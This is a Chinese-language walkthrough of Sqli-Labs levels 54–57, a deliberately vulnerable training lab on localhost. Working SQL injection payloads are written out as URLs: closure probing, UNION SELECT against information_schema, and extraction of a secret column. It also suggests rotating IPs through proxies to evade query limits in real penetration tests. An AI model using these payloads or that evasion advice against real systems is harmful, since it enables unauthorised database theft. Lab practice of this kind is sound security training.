Less 54

基于错误_GET_单引号_字符型_UNION注入

从 Less 54 - Less 65 这 12 关属于 Page 4：Challenges，这些是一些综合的注入训练，限制了查询的次数，更贴近于 GET 的实战。这也是整个 Sqli-Labs 的最后一部分。

现在我们将综合运用之前所学的各种注入技巧，拿到 flag。

http://localhost:8088/sqlilabs/Less-54/?id=1'
http://localhost:8088/sqlilabs/Less-54/?id=1"

双引号正常，单引号无报错回显，为字符型单引号闭合。

http://localhost:8088/sqlilabs/Less-54/?id=1'--+

正确回显，未过滤注释。

http://localhost:8088/sqlilabs/Less-54/?id=0' union select 1,2,3--+

既然有回显，在相应位置使用union注入即可。

http://localhost:8088/sqlilabs/Less-54/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

由主界面的提示已知数据库名是challenges，注入表名和数据即可。
这随机生成的表名真别致。

http://localhost:8088/sqlilabs/Less-54/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='mgf71onn75'--+

那个secret加上奇奇怪怪字符的字段应该就是我们想要的。

http://localhost:8088/sqlilabs/Less-54/?id=0' union select 1,2,group_concat(secret_2CU7) from challenges.mgf71onn75--+

在下面的输入框中输入 flag 即可，出现祝贺的图片：

在实际渗透测试当中，我们可以利用更换 ip（使用代理）或更换浏览器等，看服务器端检测什么内容进行限制。

Less 55

基于错误_GET_小括号_数字型_UNION注入

http://localhost:8088/sqlilabs/Less-55/?id=1'
http://localhost:8088/sqlilabs/Less-55/?id=1"
http://localhost:8088/sqlilabs/Less-55/?id=1')--+
http://localhost:8088/sqlilabs/Less-55/?id=1")--+
http://localhost:8088/sqlilabs/Less-55/?id=1)--+

单双引号都无报错回显，加了小括号还是没出现，一度怀疑人生，然后发现忘了一种小括号闭合数字型…为数字型小括号闭合。
未过滤注释，有正确回显，使用union注入。
剩下的同 Less 54。

Less 56

基于错误_GET_小括号_单引号_字符型_UNION注入

http://localhost:8088/sqlilabs/Less-56/?id=1'--+
http://localhost:8088/sqlilabs/Less-56/?id=1"--+
http://localhost:8088/sqlilabs/Less-56/?id=1')--+

单引号无报错回显，双引号和单引号加小括号有正确回显，为字符型单引号加小括号闭合。
未过滤注释，使用union注入。
剩下的还是同 Less 54。

Less 57

基于错误_GET_双引号_字符型_UNION注入

http://localhost:8088/sqlilabs/Less-57/?id=1'
http://localhost:8088/sqlilabs/Less-57/?id=1"
http://localhost:8088/sqlilabs/Less-57/?id=1")--+
http://localhost:8088/sqlilabs/Less-57/?id=1"--+

双引号和双引号加小括号无报错回显，单引号有正确回显，为字符型双引号闭合。
未过滤注释，使用union注入。
剩下的仍同 Less 54，也不知道设这么多重复关卡有啥子用…练习判断闭合么…